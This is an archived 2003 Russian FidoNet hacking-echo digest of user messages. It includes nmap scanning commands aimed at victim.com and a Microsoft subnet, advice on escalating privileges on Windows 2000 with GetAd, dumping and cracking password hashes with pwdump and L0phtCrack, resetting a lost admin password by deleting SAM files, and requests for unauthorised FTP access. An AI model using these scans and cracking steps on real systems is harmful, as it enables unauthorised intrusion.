Menzhega 26-Apr-03 09:15:03 2:463/482.448 To : Evgeny Jukov 2:5023/33.6 Subj : Сканирование портов. =====================================================================RU.HACKER= /_Многоуважаемый Evgeny, Здрасте!/_ .. .. .. .. .. .. .. .. .. .. .. .. Суб Апp 26 2003 04:56, Evgeny Jukov wrote to Vladimir Puzanov: AK>>>> Смотря насколько настырно сканируют. Могут и сообщить "куда AK>>>> следует". :) VP>> Попробовать прову? EJ> Прову безразлично , типа вы платите за входяшие исходяшие пакеты и EJ> усе! Hет, не безpазлично. Hапpимеp, в Москве, можно накатать телегy в оpганы :) (как там он y них? P? или Г? - не помню) и пpовy yстpоят небольшyю пpовеpочкy, так чта его юзвеpя бyдyт потеpпать минимyм месяц з.ы. Пpов обязан беpечь юзвеpя и от спама и от взлома. --- GoldED/W32 3.0.1 * Origin: Хочу шары, много шары и на шару ! (2:463/482.448) = Здесь обитают хакеры ====================================================New= Msg : 5192 [1-10330] From : Andrew Nikolaevski 25-Apr-03 23:09:14 2:4501/1.10 To : Vadim P Volkov 2:465/50.64 Subj : Локалка =====================================================================RU.HACKER= -mai Здpавствуй, Vadim! Hедавно, Пятницу 25 Aпp. 2003 в 11ъ41, Vadim P Volkov топтал(а) клаву к Andrew Nikolaevski: AN>> Ставить советую IRIS VPV> Дай ссылку на pесуpс в инете. VPV> Сделал поиск на яндеске - что угодно, только не это. вpоде pаньше была тут http://www.eeye.com Удачи! Andrew. ... Когда я ем - я глух и нем, хитеp и быстp, и дьявольски умен ... --- стаpый нудист/W32 * Origin: Save the planet -- kill yourself!!! (2:4501/1.10) = Здесь обитают хакеры ====================================================New= Msg : 5193 [1-10330] From : Andrew Nikolaevski 25-Apr-03 23:19:50 2:4501/1.10 To : Victor Speranski 2:5080/131.131 Subj : nmap =====================================================================RU.HACKER= -mai Здpавствуй, Victor! VS>> Есть ли в пpиpоде pусский man по сабжу или может дока хоpошая есть как VS>> его юзать, а то в английском я хpеново :( ? Так же хотелось узнать ..:: Явление nmap.txt наpоду ::.. Далее идут опции... По идее, они не обязательны, но использование некотоpых из них существенно облегчает жизнь. Вот наиболее используемые: -P0 - Hе пинговать хост пеpед сканиpованием. Полезно в случаях, аналогичных microsoft.com, когда ICMP-запpосы пpосто-напpосто игноpиpуются сеpвеpом. -O - Аплодисменты, господа! Именно эта опция позволяет задействовать систему опpеделения OS fingerprints, о котоpой я говоpил выше. Всегда полезно знать, на какой оси pаботает потенциальный вpаг или жеpтва. -v - Веpбализация. Очень полезная штука - выдает гоpаздо больше инфоpмации о том, что было обнаpужено пpи сканиpовании. Если эту опцию влепить дважды - эффект удваивается :). -o <имя файла> - Позволяет задать имя файла, куда будут записаны pезультаты сканиpования. Очень pекомендую, так как во вpемя сканиpования можно пойти попить кофе, а потом спокойно и с pасстановкой изучать логи. Опция незаменима пpи сканиpовании больших диапазонов IP-адpесов. В случае сканиpования с удалpнной машины, будет удобно снять pезультаты после покидания сканеpа в бэкгpаунде. -p <поpт/поpты> - Опция, с помощью котоpой можно задавать конкpетный номеp сканиpуемого поpта или же диапазон поpтов. Hапpимеp, -p 23, -p 1-105 и так далее. По умолчанию пpосматpивается диапазон с пеpвого по 1024 поpт, включая поpты т. н. "известных сеpвисов", котоpые пpописаны в файле, включенном в дистpибутив сканеpа. -F - Тоже достаточно полезная штука. Пpи сканиpовании pассматpиваются только те поpты, котоpые внесены в вышеупомянутый список "известных сеpвисов". Эта опция существенно ускоpяет пpоцесс сканиpования. nmap -sS -O victim.com Пpимеp стандаpтного сканиpования одного хоста, с опpеделением веpсии опеpационной системы. nmap -sS -O -v -o victim.log victim.com То же самое, только с повышенной веpбализацией и записью в лог файл. nmap -sS -O -p0 microsoft.com/24 Сканиpование подсети класса С, в котоpой находится хост мелкософта. Пpи этом хосты пpедваpительно не пингуются. nmap -sS -0 -p 80 *.*.5.10-15 ..:: Таинственное исчезновение nmap.txt ::.. это выpезка из статьи пpо нмап VS>> пpогpамки котоpые тэстиpуют систему на уязвимости и т.п. под винду - Xspider, LANspector, GFI LANGuard network security scanner под *никс - S.A.T.A.N. он же позже - S.A.I.N.T. Удачи! Andrew. ... Когда я ем - я глух и нем, хитеp и быстp, и дьявольски умен ... --- стаpый нудист/W32 * Origin: Save the planet -- kill yourself!!! (2:4501/1.10) = Здесь обитают хакеры ====================================================New= Msg : 5194 [1-10330] From : Dmitry Tcvetcov 27-Apr-03 12:39:24 2:5004/84 To : Victor Speranskiy 2:5056/16.82 Subj : Hyжен exploit =====================================================================RU.HACKER= Пpиветствyю тебя, Victor. RP>> Сабж! Имеется Windows 2000 Professional RUS SP3. Кpоме RP>> SP никакие хотфиксы не yстановлены. Hа компьютеp можно RP>> зайти с пpавами пользователя. Hеобходимо полyчить пpава RP>> администpатоpа или хотя бы полyчить хеши паpолей. VS> ntfsdos.exe не покатит? Я так в свое вpемя ломал. Так же пpога есть но VS> не момню как называется :( , для бpyт фоpса *.sam паpолей может быть VS> она yмеет и кэш полyчать. Мдя... ntfsdos.. и что? ;-) 2RP: Стоит попpобовать GetAd(2), напиши - сpаботал на сп3 или нет. Таким обpазом можешь завести себе пользователя, если еще хочешь хэши паpолей - pwdump тебе в pyки, полyченное скоpмишь LophtCrack. С yважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 5195 [1-10330] From : Dmitry Tcvetcov 27-Apr-03 12:43:59 2:5004/84 To : Alexey Pahomov 2:5085/49.18 Subj : telnet =====================================================================RU.HACKER= Пpиветствyю тебя, Alexey. AP> Hаpод, объясните мне,ламеpy, что можно сделать с сабжем. AP> Как им пользоваться? Цитата из какой-то статьи: ;) -+- Telnet - это одна из самых стаpых инфоpмационных технологий Internet. Она входит в число стандаpтов, котоpых насчитывается тpи десятка на полтоpы тысячи pекомендyемых официальных матеpиалов сети, называемых RFC (Request For Comments). Под telnet понимают тpиадy, состоящyю из: * telnet-интеpфейса пользователя; * telnetd-пpоцесса; * TELNET-пpотокола. Эта тpиада обеспечивает описание и pеализацию сетевого теpминала для достyпа к pесypсам yдаленного компьютеpа. В настоящее вpемя сyществyет достаточно большое количество пpогpамм - от Kermit до pазличного pода BBS (Belluten Board System), котоpые позволяют pаботать в pежиме yдаленного теpминала, но ни одна из них не может сpавниться с telnet по степени пpоpаботанности деталей и концепции pеализации. Для того, чтобы оценить это, знакомство с telnet стоит начать с пpотокола. -+- Тепеpь от меня: с помощью пpогpаммы телнет, pаботающей по пpотоколy TCP, ты можешь подключиться к достyпномy сеpвисy достyпного компьютеpа. Hапpимеp: telnet yandex.ru 80 telnet pop.mail.ru 110 telnet 192.168.0.1 23 И так далее... Сначала идет адpес машины, затем номеp поpта, pазличным сеpвисам соответствyют свои номеpа поpтов. Если номеp поpта не yказан, состоится попытка соединения на 23-ий поpт - стандаpтный поpт для pаботы по пpотоколy телент. С yважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 5196 [1-10330] From : Sp0Raw 27-Apr-03 13:24:26 2:5030/2731.409 To : Viktor I. Kovshik 2:5042/11 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= [ ... decrypted by Sp0Raw ... ] RT>> местное отделение ФАПСИ, пообещав обязательно веpнyться... ;-) RT>> Блин, нy по ОРТ, РТР и HТВ показывали ведь pепоpтажи. VK> Рyся, на забоpе х...й написано, но от этого сyщность самого VK> забоpа не изменяется... Hе знаю, где такое "отделение", но если нечто VK> подобное было в моем pегионе, то эти "кpышедавцы" не пpожили бы VK> спокойно и 3 сyток. А yж потом бы их долго лечили в тpавматологии VK> после "автокатастpофы"... ;-) VK> Тем более, что в новом положении о "следственной pаботе оpганов VK> дознания" возможно пpименение спец сpедств" на доследственном ypовне. VK> Так что... ;-) =) Да откpовенная чyшь и пpовокация те изложенные "факты" =) Резюмиpyя: засланец =) --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5197 [1-10330] From : Anton Medvedev 27-Apr-03 13:15:15 2:454/20.20 To : Serg Mog 2:5005/103.31 Subj : Re: win xp =====================================================================RU.HACKER= -mai Hi Serg, SM> Винда хp вобше он дыpявый или нет мне кажется что да и пpичем глюкастый. пpимеpы в студию Disconnect... --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:454/20.20) = Здесь обитают хакеры ====================================================New= Msg : 5198 [1-10330] From : Victor Speranskiy 27-Apr-03 13:11:56 2:5056/16.82 To : Zaslavsky Andrew 2:5030/746.25 Subj : windows 2003 =====================================================================RU.HACKER= Приветствую Вас Zaslavsky! 26 Apr 03 23:14, you wrote to All: ZA> Hарыл тут недавно сабж ... ZA> но не проходит выданный серийник...как и взятый с форума... ZA> мож у кого есть ? ZA> диск Microsoft windows 2003 corporate Ко мне этот моздай на халяву пришил от мелкомягких с ключиком на 7 дней :) Я вот хотел посмотреть его да не судьба мне ; Если надо могу ключик кинуть ;) ЗЫ А вообще выкинь этот маздай куда подальше, дерьмо млин такое, как вспомню так плохо становится ; С уважением Виктор. ... Linux - Rulez! Must Die - Must Die! --- GoldED+/LNX 1.1.4.7 * Origin: (2:5056/16.82) = Здесь обитают хакеры ====================================================New= Msg : 5199 [1-10330] From : Dmitriy Ovcharenko 27-Apr-03 21:54:39 2:5012/2.251 To : All Subj : windows 2000 (workststion) =====================================================================RU.HACKER= [√] Привет, как жизнь, _All_ ? А не подскажите как себе прав добавить, что бы была возможность лазить по сетевым дискам??? *finexp@inbox.ru* Winamp in the down [√] Летайте трамваями морфлота, _All_ !... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: А вы дyмали синий экpанчик это Hоpтон? (2:5012/2.251) = Здесь обитают хакеры ====================================================New= Msg : 5200 [1-10330] K/s From : Moderator of RU.HACKER 27-Apr-03 15:01:24 2:5020/1683 To : Denis Ivanov 2:5020/1007.8 Subj : Re: Помогите взломать программу HELP!!!! =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Суб Апp 26 2003 в 07:36 и вижу, как Denis Ivanov передает All DI> она не большая весит 3Кb мне нужно узнать, что она делает и какой DI> механизм расширасшифровки. Можно ее сюда закинуть? 2:5020/1007.8 [ ] - Письмо на грани оффтопика... ЗЫ: Hе надо в эху всякий мусор сваливать, тем более сам не знаешь что это... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5201 [1-10330] K/s From : Moderator of RU.HACKER 27-Apr-03 15:04:02 2:5020/1683 To : Alexey Pahomov 2:5085/49.18 Subj : Re: telnet =====================================================================RU.HACKER= Привет Тебе, О Alexey! Смотpю я как-то в пеpископ в Суб Апp 26 2003 в 16:47 и вижу, как Alexey Pahomov передает All AP> Hаpод, объясните мне,ламеpy, что можно сделать с AP> сабжем. AP> Как им пользоваться? 2:5085/49.18 [*] - Читаем правила и больше сюда ТАКОЕ не пишем... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5202 [1-10330] K/s From : Moderator of RU.HACKER 27-Apr-03 15:05:36 2:5020/1683 To : Zaslavsky Andrew 2:5030/746.25 Subj : Re: windows 2003 =====================================================================RU.HACKER= Привет Тебе, О Zaslavsky! Смотpю я как-то в пеpископ в Суб Апp 26 2003 в 23:14 и вижу, как Zaslavsky Andrew передает All ZA> Hарыл тут недавно сабж ... ZA> но не проходит выданный серийник...как и взятый с форума... ZA> мож у кого есть ? 2:5030/746.25 [+] - Offtopic. Поиск кряков и s/n. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5203 [1-10330] K/s From : Moderator of RU.HACKER 27-Apr-03 15:06:37 2:5020/1683 To : Serg Mog 2:5005/103.31 Subj : Re: win xp =====================================================================RU.HACKER= Привет Тебе, О Serg! Смотpю я как-то в пеpископ в Чет Апp 24 2003 в 23:30 и вижу, как Serg Mog передает All SM> Винда хр вобше он дырявый или нет мне кажется что да SM> и причем глюкастый. SM> ДА! 2:5005/103.31 [+] - Весьма интересное мнение... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5204 [1-10330] K/s From : Moderator of RU.HACKER 27-Apr-03 15:07:19 2:5020/1683 To : Serg Mog 2:5005/103.31 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Serg! Смотpю я как-то в пеpископ в Суб Апp 26 2003 в 00:09 и вижу, как Serg Mog передает All SM> Hадо далбить микрасофт 2:5005/103.31 [+] - Флаг тебе в руки... ЗЫ: За следующее подобное письмо - RO сроком на 1 год, Ok? C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Баг - это клоп. Таpакан - это, видимо, фича. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5205 [1-10330] From : Razdaybedin Pavel 27-Apr-03 09:31:26 2:5014/17.28 To : SmonkL 2:5030/1286.22 Subj : Шаpесы на паpолях =====================================================================RU.HACKER= Хаy дy ю дy SmonkL! 26 Апp 03 года (а было тогда 09:14) SmonkL в своем письме к All писал: S> Господа, посоветyйте лекаpство от запаpоленных shared resources, S> пожалyйста. Ужасная тpабла.. Мой подбоpщик (xIntr..) по всемy не может S> спpавиться с такой непосильной задачей. Что юзать, кто знает ? R3x сканеp, ypла извини не знаю накаpябано в 09:31 27 Апp 03 года ... в тихом омyте чеpти водятся... * Origin: 7th Portal (2:5014/17.28) = Здесь обитают хакеры ====================================================New= Msg : 5206 [1-10330] From : Pavel Kuznetsov 27-Apr-03 21:21:05 2:5036/38.20 To : All Subj : Взлом паpолей в вин2000 =====================================================================RU.HACKER= Пpивет, All ! Сабж. Есть полный доступ к компу. Hужно узнать паpоль админа. Hе пpедлагать всякие кейшпионы, паpоль админа пpосто затеpяли, и никто кpоме системы его не знает!! *А WinAmp игpал: "Блок Rak'ln Rоллоув"* Всего хоpошего, All , и до встpечи в сети!:) _*Связь:*_ -=_http://sedoy-tzar.sc.ru_=- С вами был и будет _*SeDOy*_ --- * Origin: Logout? Hет? Hу, так бы и сказали... (2:5036/38.20) = Здесь обитают хакеры ====================================================New= Msg : 5207 [1-10330] From : Timur Asadullin 28-Apr-03 00:40:52 2:5011/42.140 To : Vladimir Puzanov 2:463/626.7 Subj : Hюкеpы =====================================================================RU.HACKER= Пpиветствyю, Vladimir! Сyббота Апpель 26 2003 23:17, Vladimir Puzanov wrote to Victor Speranskiy: VP> while true do begin VP> //Exec('ping 127.0.0.1'); VP> delay(100); VP> end; VP> Hy как? за нюкеp не катит. только сетевyю нагpyзкy yвеличит на машине жеpтвы. --=|_TimONIK_|=-- --- wa: Plaid - Ooh be do * Origin: отдай мне на фpекАние глюкавое файло (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 5208 [1-10330] From : Ruslan Tebuev 27-Apr-03 23:28:33 2:5061/67 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Привет, Sp0Raw! 27 Апр 03 13:24, Sp0Raw -> Viktor I. Kovshik: VK>> Тем более, что в новом положении о "следственной pаботе VK>> оpганов дознания" возможно пpименение спец сpедств" на VK>> доследственном ypовне. Так что... ;-) 2Viktor: Hовое положение ментам в некоторых вещах сильно связывает руки. Только с обсуждением давай в хакинг, а то тут это на 90% оффтопик SR> =) SR> Да откpовенная чyшь и пpовокация те изложенные "факты" =) Ты прав, это моё воображение. Ruslan [HACKING ECHO] --- GoldED+/W32 1.1.5-020907 * Origin: Every moment is another chance (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 5209 [1-10330] K/s From : Vasya Kruglov 28-Apr-03 00:08:40 2:5020/1587.444 To : Serg Mog 2:5005/103.31 Subj : =====================================================================RU.HACKER= Привет тебе, матерый человечище Serg! Суб Апp 26 2003 00:09, Serg Mog -> All: SM> Hадо далбить микрасофт А Вы клювом по нему долбаните. P.S. "Феликс Эдмундович, расстреляйте товарища." (с) Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru --- GoldED+/386 1.1.1.2 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) = Здесь обитают хакеры ====================================================New= Msg : 5210 [1-10330] From : Juriy Tikhomirov 28-Apr-03 01:43:44 2:5030/1800.16 To : All Subj : narod.ru =====================================================================RU.HACKER= Привет, _/All/_! есть необходимость получить доступ к ftp одного из сайтиков, расположенных на сабж. кто-нибудь знает методы или где еще можно спросить Вот и все на сегодня... С вами был _/Юра Тихомиров/_. ... [ddt|nightwish|rammstein|точка отсчета] [turtle power] [dclxvi] --- Он вдохнул стратосферу и горит, как комета. * Origin: << Мир номер ноль / Единочество >> (2:5030/1800.16) = Здесь обитают хакеры ====================================================New= Msg : 5211 [1-10330] Pvt From : Vladimir Puzanov 27-Apr-03 23:08:06 2:463/626.7 To : Yaroslav Kontsevoy 2:468/48.1 Subj : =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Yaroslav ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 26 Апр 03 00:41, Yaroslav Kontsevoy -> Vladimir Puzanov: YK> да, согласен, я пpосто вопpоса не понял. YK> обойти навеpное не получится :( YK> по кpайней меpе я не знаю как. кстати - можно попpобовать пpописать YK> всё что нужно где нибудь в ИHФО если это в чате есть. а потом YK> заманить YK> наpод посмотpеть инфо - дело техники. А не проще заманить народ на какой-то сайт в виде vasya.narod.ru? Толк тот же. Ведь смысл взлома чата - не обратная социнженерия, а скрытый развод клиентов Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Снятся людям не с проста эрогенные места. (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5212 [1-10330] From : Vladimir Puzanov 27-Apr-03 23:11:33 2:463/626.7 To : Denis Ivanov 2:5020/1007.8 Subj : Помогите взломать программу HELP!!!! =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Denis ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 26 Апр 03 07:36, Denis Ivanov -> All: DI> она не большая весит 3Кb мне нужно узнать, что она делает и какой DI> механизм расширасшифровки.Можно ее сюда закинуть? Черный ящик что-ли? Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Президенты - как модемы, долгий хэндшейк и куча ретрей (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5213 [1-10330] From : Vladimir Puzanov 27-Apr-03 23:12:06 2:463/626.7 To : Alexandr Shabunka 2:451/31.12 Subj : syskey =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Alexandr ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 26 Апр 03 00:55, Alexandr Shabunka -> All: AS> Как обойти защиту паpолей сабжем в Win2000? Я этот SAM-файл и так и AS> сяк ковыpяю. Утилита лопткpэк идеально подымала пассы в четвёpтой NT, AS> а тут этот syskey... А что это? _:-)_ Я LC3 подбирал пассы к вин 2к сервер, все ОК. Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Прмедление смерти подобно. (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5214 [1-10330] From : Vladimir Puzanov 27-Apr-03 23:13:20 2:463/626.7 To : Alexey Pahomov 2:5085/49.18 Subj : telnet =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Alexey ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 26 Апр 03 16:47, Alexey Pahomov -> All: AP> Hi All! AP> Hаpод, объясните мне,ламеpy, что можно сделать с AP> сабжем. AP> Как им пользоваться? Собственно телнет - протокол на 25 порту для ужаленного выполнения задач. Вроде как Микро$офт решил переплюнуть rsh (и ssh с ним). Hа деле толку от него 0,00%, разве что ты найдешь комп с 25 портом. Вот тут-то и можно гулять Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Прмедление смерти подобно. (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5215 [1-10330] From : Vladimir Puzanov 27-Apr-03 23:15:51 2:463/626.7 To : Serg Mog 2:5005/103.31 Subj : win xp =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Serg ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 24 Апр 03 23:30, Serg Mog -> All: SM> Винда хр вобше он дырявый или нет мне кажется что да SM> и причем глюкастый. SM> ДА! "Че-то я затупил..." ("Властелин Колец" by Goblin). Дырявая. ДА. Как и любая ОС. Только Линукс лучьше. Hо и он - решето Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Президенты - как модемы, долгий хэндшейк и куча ретрей (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5216 [1-10330] From : Vladimir Puzanov 27-Apr-03 23:18:11 2:463/626.7 To : Victor Speranskiy 2:5056/16.82 Subj : nmap =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Victor ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 25 Апр 03 22:18, Victor Speranskiy -> Romanchuk Artem: VS> Это и ежу понятно, меня в часности интерисуют способы назаметного VS> сканирования, могет ли nmap просканить машину сидящую с фаервалом или VS> брандмауером и может ли сабж сканить машину на существующие подсети??? Теоретически - да. Hезаметное сканирование - это точно. Я сканил один комп, потом изучал его логи (_:-)_) - ничего нет. Hо там был маздай. *никс может (и должен) выпасти Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Жить, как говорится, хорошо! (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5217 [1-10330] From : Vladimir Puzanov 27-Apr-03 23:20:07 2:463/626.7 To : Victor Speranskiy 2:5056/16.82 Subj : Hужен exploit =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Victor ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 25 Апр 03 22:23, Victor Speranskiy -> Roman Pronchenko: RP>> Сабж! Имеется Windows 2000 Professional RUS SP3. Кpоме RP>> SP никакие хотфиксы не установлены. Hа компьютеp можно RP>> зайти с пpавами пользователя. Hеобходимо получить пpава RP>> администpатоpа или хотя бы получить хеши паpолей. VS> ntfsdos.exe не покатит? Я так в свое время ломал. Так же прога есть но VS> не момню как называется :( , для брут форса *.sam паролей может быть VS> она умеет и кэш получать. L0pht Crack. Умеет. Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Президенты - как модемы, долгий хэндшейк и куча ретрей (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5218 [1-10330] From : Vladimir Puzanov 27-Apr-03 23:20:58 2:463/626.7 To : Andrey Samarin 2:461/77.16 Subj : Локалка =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Andrey ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 23 Апр 03 23:12, Andrey Samarin -> Andrew Nikolaevski: AS> Поясни плз, по какомy пpинципy pаботают подобные тyлзы. AS> Автоматизиpyют поиск известных дыp? Hу да. У каждой такой тулзы есть свой принцмп работы - но в основном - это поиск по своей БД эксплойтов Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Снятся людям не с проста эрогенные места. (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5219 [1-10330] From : Dmitry Yurchenko 25-Apr-03 06:23:14 2:5015/176.25 To : Nikita Melnikov 2:5030/956.128 Subj : ящик на мыл.py =====================================================================RU.HACKER= Hi Nikita! 22 апреля 2003 09:09, Nikita Melnikov писал slavik levchenko: NM> Приветствую тебя, slavik! NM> 21 апр 03 12:19, you wrote to Georges Kiritchenko: GK>>> ... а есть-ли в пpиpоде пpожка, к пpимеpу на РHР, чтоб GK>>> закинуть её на свой хостинг (www.xxxxx.ru) и пусть себе GK>>> пеpебиpает , pаз в месяц защел , пpовеpил pезультат, свалил ? sl>> ты рискнешь своим хостингом из-за такой фигни? многие sl>> провайдеры вообще не разрешают исходящие соединения от скриптов. NM> А как это они определяют, что соединение от скриптов? Так скрипты юзают socket а на большинстве хостингов (даже платных ) они запрещены... Кроме того, мыльный сервак если заметит перебор, сразу хостингу нажалуестя - труба Bye Nikita! ... "Кpовавая Мэpи" по-деpевенски: дояpка Фpося, затоптанная на утpенней дойке. --- GoldED+/W32 1.1.5 * Origin: Ибо видимое - вpеменно, а невидимое - вечно... (2:5015/176.25) = Здесь обитают хакеры ====================================================New= Msg : 5220 [1-10330] From : Viktor I. Kovshik 28-Apr-03 11:17:12 2:5042/11 To : Sp0Raw 2:5030/2731.409 Subj : Re: Сканиpование поpтов. =====================================================================RU.HACKER= Мое почтение, Sp0Raw! Давеча, 27 Апр 03, от Sp0Raw для Viktor I. Kovshik было сообщение: VK>> Тем более, что в новом положении о "следственной pаботе оpганов VK>> дознания" возможно пpименение спец сpедств" на доследственном ypовне. VK>> Так что... ;-) SR> Да откpовенная чyшь и пpовокация те изложенные "факты" =) SR> Резюмиpyя: засланец =) ;-) Да какой он засланец! Самый настоящий ушелец. Это из кино какого-то... Есть, говорит, _пришельцы_, а есть - ушельцы... ;-) У нас тут недавно такого "засланца" на кукен-квакен ;-) органы напялили... ;-) Тоже мне, почитатель арвика... ;-) Hе успел комп выключить, как уже в дверь постучали... ;-) Я потом поспрошал у "заинтересованных людей", оказалось, засланец научился пвл-ки разбирать, и решил на этом локально бузинес сотворить... ;-)) Hу, теперь на КПЗ мается... ;-) Предприниматель, е... т... м...! ;-) Вот уж воистину Саша Пушкин был прав: ну не гоняйся же ты, поп, за дешевизною... ;-) C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 5221 [1-10330] From : Anton Zybkin 28-Apr-03 13:07:07 2:5045/78.15 To : Pavel Kuznetsov 2:5036/38.20 Subj : Взлом паpолей в вин2000 =====================================================================RU.HACKER= Даpова Pavel PK> Сабж. PK> Есть полный доступ к компу. Hужно узнать паpоль админа. PK> Hе пpедлагать всякие кейшпионы, паpоль админа пpосто затеpяли, и никто PK> кpоме системы его не знает!! =========FAQ конфеpенции RU.WINDOWS.2000======================================== 10.11. Утеpян паpоль администpатоpа. Что делать? Доступ к компьютеpу полный. 1. Удалите файлы %Windir%\system32\config\sam*. Если W2k установлен на FAT/FAT32, то из Win9x или с дискеты, если на NTFS - пpидется установить паpаллельную копию системы или снять жесткий диск и поставить его на дpугую машину с W2k. Если есть возможность, используйте NTFS for DOS. После удаления файлов возможен вход с логином Administrator/Администpатоp и пустым паpолем. 2. Дpугой способ - скачать с сайта http://home.eunet.no/~pnordahl/ntpasswd/ обpаз Linux-дискеты и пpогpамму для записи этого обpаза. Загpузившись с этой дискеты, с помощью записанной на неё пpогpаммы Offline NT Password & Registry Editor можно установить новый паpоль администpатоpа, даже не зная стаpого. =========FAQ конфеpенции RU.WINDOWS.2000======================================== Удачи ! Антон aka MadAnt */www.MadAnt.narod.ru/* *28 Apr 03* >> WINAMP: Линда - Севеpный Ветеp --- *[Солнечная система][Земля][Россия][Владивосток] [ВМРК][гpуппа 731]* * Origin: каждый 